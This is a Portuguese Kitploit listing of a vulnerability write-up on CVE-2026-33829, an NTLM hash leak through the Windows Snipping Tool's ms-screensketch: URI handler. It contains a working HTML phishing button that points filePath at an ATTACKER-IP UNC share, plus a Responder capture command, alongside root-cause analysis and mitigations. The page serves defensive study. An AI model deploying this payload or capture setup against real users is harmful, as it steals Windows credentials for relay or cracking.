Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-33829-Writeup — Estudo de Caso de Vulnerabilidade: CVE-2026-33829 (Coerção NTLM da Ferramenta de Recorte do Windows) | Kitploit
Ferramentas/GitHubGitHub/rahultb-sec/cve-2026-33829-writeup
Quebra de SenhasAnálise de VulnerabilidadesExploraçãoColeta de InformaçõesPhishingAprendizado e Educação
GitHubrahultb-sec/cve-2026-33829-writeup

CVE-2026-33829-Writeup

Estudo de Caso de Vulnerabilidade: CVE-2026-33829 (Coerção NTLM da Ferramenta de Recorte do Windows)

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório
127há 4 mesesAinda não revisado

CVE-2026-33829-Análise

Estudo de Caso de Vulnerabilidade: CVE-2026-33829 (Coerção NTLM na Ferramenta de Captura do Windows)

Resumo Executivo

Esta análise detalha a replicação técnica da CVE-2026-33829, uma vulnerabilidade de divulgação de informações na estrutura moderna do aplicativo Ferramenta de Captura do Windows. Ao abusar de um parâmetro de entrada não validado dentro de um manipulador de protocolo URI personalizado, um host remoto pode coagir uma máquina Windows não corrigida a iniciar uma conexão SMB de saída, resultando no vazamento de hashes de autenticação Net-NTLMv2 pela rede.

Esquema URI - (O Windows usa protocolos personalizados (como ms-screensketch:, ms-settings: , file:) para permitir que navegadores da web conversem com aplicativos da área de trabalho.)

Análise da Causa Raiz

A causa raiz dessa vulnerabilidade está no esquema URI (ms-screensketch:edit). Quando uma vítima clica em um link malicioso contendo (ms-screensketch:edit?&filePath=\\ATTACKER_IP\\share\evil.png) e aprova a "Abrir Ferramenta de Captura". O sistema operacional invoca o SnippingTool.exe e passa o parâmetro filePath malicioso, como (ms-screensketch:edit?filePath=\\ATTACKER-IP\\share\evil.png) sem uma validação adequada.

Como existe um parâmetro :edit?, a ferramenta de captura tenta editar o arquivo do caminho fornecido (filePath=\\ATTACKER-IP\\share\evil.png). Isso resulta no início de uma conexão pela rede usando o Server Message Block (SMB). Como o SMB foi projetado para verificar quem está solicitando o arquivo, o Windows tenta automaticamente autenticar o usuário. Ele envia o hash de desafio-resposta Net-NTLMv2 do usuário atualmente logado para o servidor do atacante. Todo o processo ocorre silenciosamente em segundo plano, sem qualquer aviso ou prompt visível para o usuário.

O atacante captura os dados de autenticação de desafio-resposta Net-NTLMv2 da vítima. Uma vez que o atacante possui o hash Net-NTLM da vítima, ele pode realizar um ataque de relay NTLM para se passar pela vítima e acessar recursos internos da rede ou autenticar em outros serviços na empresa, ou levar o hash capturado offline e usar ataques de força bruta ou dicionário para descobrir a senha real em texto plano do Windows da vítima.

Prova de Conceito

Para acionar o manipulador, um payload HTML simples foi implantado para simular um vetor de phishing ou comprometimento de intranet

<!DOCTYPE html>
<html>
<body>
  <button onclick="window.location.href='ms-screensketch:edit?&filePath=\\ATTACKER-IP\share\test.png&isTemporary=false&saved=true&source=Toast'">Launch Verification</button>
</body>
</html>
3

Para capturar o Hash, foi implantada uma instância isolada do Kali Linux executando o Responder

sudo responder -I eth0 -v

1

Ao clicar no botão no ambiente Windows alvo, o aplicativo abriu o contexto de Edição e imediatamente roteou uma solicitação SMB para o host ouvinte. A sequência de desafio-resposta de autenticação foi concluída perfeitamente, capturando a estrutura do hash Net-NTLMv2 para o contexto do usuário alvo.

2 Captura de tela (103) O pacote NTLMSSP_NEGOTIATE mostra o sistema vítima iniciando a autenticação NTLM durante a configuração da sessão SMB após resolver o caminho UNC controlado pelo atacante Captura de tela (104)

O pacote NTLMSSP_AUTH contém os dados de autenticação de desafio-resposta Net-NTLMv2 transmitidos pelo sistema vítima após a fase de desafio ser concluída.

A partir disso, o Atacante captura o hash NTLMv2 transmitido

4

Os dados de desafio-resposta Net-NTLMv2 capturados podem ser utilizados em ataques de relay NTLM ou submetidos a tentativas offline de quebra de senha, dependendo do ambiente alvo.

Remediação

Como a Microsoft corrigiu isso?

Antes da correção, a função de Edição da Ferramenta de Captura pegava a string dentro de filePath e a passava diretamente para as APIs de abertura de arquivo.

O comportamento observado após a correção sugere que a Microsoft introduziu uma lógica de validação que impede que valores de filePath baseados em rede/UNC cheguem às APIs de manipulação de arquivo subjacentes. Agora, quando você passa uma string para filePath, o aplicativo realiza uma verificação de sanidade antes de entregá-la ao sistema operacional:

  • Ele verifica se a string começa com marcadores de unidade local (como C:\ ou D:) ou variáveis de sistema local seguras padrão.
  • Se o aplicativo detectar um prefixo de Convenção de Nomenclatura Universal (UNC) (como \ ou \\), ou um padrão de rede IP externo, o loop de validação sinaliza como argumento ilegal, lança um erro de exceção e encerra o processo de carregamento do arquivo imediatamente.
  • Como o código para antes de executar as instruções de abertura de arquivo Win32, o Kernel do Windows nunca recebe a solicitação e nenhum pacote SMB é enviado.

Se tentarmos novamente após aplicar a atualização de segurança, o aplicativo ainda invocava o manipulador ms-screensketch:, mas os valores de filePath remotos não eram mais resolvidos através do fluxo de trabalho de Edição

Garanta que todos os endpoints Windows sejam atualizados além da linha de base do patch de segurança de 14 de abril de 2026, que introduz limites estritos de validação de entrada no manipulador do aplicativo.

Aplique regras rigorosas de firewall de saída bloqueando tráfego TCP de porta 445 para redes externas não autorizadas, mitigando o risco de vazamento de credenciais.

Configure Objetivos de Política de Grupo (GPOs) para restringir o tráfego NTLM de saída para servidores remotos, forçando protocolos alternativos seguros como Kerberos quando aplicável.

Pós-análise da CVE-2026-33829 demonstra como fluxos de trabalho confiáveis de aplicativos e comportamentos de autenticação legados podem expor involuntariamente material de credenciais através de interações de rede de saída. Embora a vulnerabilidade não forneça execução direta de código, ela reforça a importância de restringir a autenticação NTLM desnecessária, monitorar o tráfego SMB de saída e validar o manuseio de recursos orientados por URI em ambientes Windows.

         Aviso Legal: Esta análise é compilada estritamente para fins educacionais, pesquisa defensiva e validação em laboratório. Todos os testes foram realizados em um ambiente de sandbox totalmente isolado.
Baixar ferramenta